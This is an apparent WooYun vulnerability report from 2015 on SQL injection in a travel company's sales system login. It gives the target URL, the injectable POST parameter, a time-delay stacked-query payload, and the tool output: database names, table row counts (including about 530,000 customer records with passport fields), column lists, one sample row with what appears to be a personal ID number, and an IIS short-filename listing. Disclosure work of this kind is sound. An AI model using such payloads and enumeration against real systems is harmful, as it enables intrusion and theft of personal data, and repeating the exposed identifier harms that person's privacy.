当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117788

漏洞标题:腾邦国际某重要系统SQL注射泄露员工信息&用户护照等信息

相关厂商:腾邦集团

漏洞作者: 路人甲

提交时间:2015-06-03 09:10

修复时间:2015-07-20 14:22

公开时间:2015-07-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

233

详细说明:

http://sales.tempus.cn系统登录处
http://sales.tempus.cn:80/default.asp?action=login (POST)
submit=&textfield=AzRhEli1&textfield2=1

漏洞证明:

---
Parameter: textfield (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: submit=&textfield=AzRhEli1');WAITFOR DELAY '0:0:5'--&textfield2=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'zytoa'
available databases [14]:
[*] [CobraDGSesver\x04]
[*] [dayniton\x02]
[*] [master\x03]
[*] [oanew\x05a1\x11\x02]
[*] AdvanEmpDb
[*] model
[*] msdb
[*] Standard_Global
[*] StandardCommonModule
[*] tempdb
[*] tgctour2010
[*] trafax60
[*] veetermsharelog
[*] zytoa
Database: zytoa
+------------------+---------+
| Table | Entries |
+------------------+---------+
| zytoa.kehu | 533296 | 53万客户,涉及护照信息
| zytoa.gongdan | 407068 | 40万工单
| zytoa.guoji | 374765 |
| zytoa.LogIP | 204865 |
| zytoa.tuipiao | 21037 |
| zytoa.piao | 10337 |
| zytoa.guonei | 8927 |
| zytoa.otherpiao | 7284 |
| zytoa.yjflog | 6257 |
| zytoa.gd | 1294 |
| zytoa.yjf | 669 |
| zytoa.News | 458 |
| zytoa.yuangong | 370 | 员工信息
| zytoa.gys | 198 |
| zytoa.airwayslxr | 173 |
| zytoa.airways | 139 |
| zytoa.piaogroup | 51 |
| zytoa.bumen | 24 |
| zytoa.quanxian | 18 |
| zytoa.bigbumen | 12 |
| zytoa.SmallClass | 3 |
+------------------+---------+
下面贴出列信息,不贴数据证明:
Table: zytoa.kehu
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| pnrid | kehuid | guoji | baoxian | xingbie | xingming | huiyuanhao | piaohao | chengyun | huzhaohaoma | chushengnianyue | huzhaoyouxiaoqi | xingchengdan | zhengjiqnleixing |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| 119 | 100 | CN | | | 遟乓獞 | | | | 420112197609081519 | \x05 | | | |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
Table: zytoa.gongdan
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
| pnrid | lianxidianhua | sub | flag | dahui | beizhu | lirunA | gystime | ifzhifu | pnrdata | pnrcode | kehutime | tiaojian | lianxiren | ITINERARY | zhifuyuan | zuoxiyuan | yuejiefang | zuoxibumen | dijia_heji | huilv\x11 | chupiaoyuan | shoujihaoma | diaoduyuanA | tuishenyuan | chushenyuan | songpiaoyuan | shoujia_heji | piaotype\t | chupiaobumen | zhifushijian | xieyijingban | gongyingshang | songpiaodizhi | diaodushijian | kepiaoxingshi | baoxian_dijia | zhongshenyuan | yingyebumaoli | BookingPerson | InvoiceNumber | fukuangfangshi | chupiaoshijian | tuishenshijian | jieshoushijian | chushenshijian | baoxian_source | tianjiashijian | songpiaoshixian | baoxian_shoujia | OwnerDepartment | baoxian_zhangshu | iSShanghaiyingyebu | zhongshenshijian\x05 |
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
Table: zytoa.yuangong
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
| id | idcode | bumenid\x02 | qq | msn | theme | zuoji | email | zaizhi | shouji | username | xingming | quanxian | password | bumenquanxian |
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
拿到员工信息,是不是可以进内网了?
---------------------------------------------------------------------
送个iis枚举
Dir: /airway~1
Dir: /aspnet~1
File: /callce~1.asp
File: /chupia~1.asp
File: /chushe~1.asp
File: /ch4f02~1.asp
File: /ch4f06~1.asp
File: /ch588c~1.asp
File: /ch9f02~1.asp
File: /ch9880~1.asp
File: /coa77a~1.asp
File: /count_~1.asp
File: /co5a42~1.asp
File: /fare_i~1.asp
File: /newsea~1.asp
File: /piaogr~1.asp
File: /tmp_ri~1.asp
File: /tm143c~1.asp
File: /tm1438~1.asp
File: /viewpr~1.asp
File: /xieyie~1.asp
File: /xieyik~1.asp
File: /xieyiv~1.asp
File: /xlf96c~1.asp
File: /xlf964~1.asp
File: /xlf968~1.asp
File: /xls_fe~1.asp
File: /xls_co~1.asp
File: /xls_ge~1.asp
File: /xls_ri~1.asp
File: /xls_ti~1.asp
File: /xls_wi~1.asp
File: /xl4cbb~1.asp
File: /xl4c7b~1.asp
File: /xl408b~1.asp
File: /xl487b~1.asp
File: /xl967e~1.asp
File: /zha31a~1.asp
File: /zhe316~1.asp
File: /zhongs~1.asp
File: /rif6ea~1.asp
File: /right_~1.asp


20150602174943.png

修复方案:

~~~~~~~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-05 14:21

厂商回复:

感谢厂商以及白帽子的协助发现,我们已经安排人员处理中。

最新状态:

暂无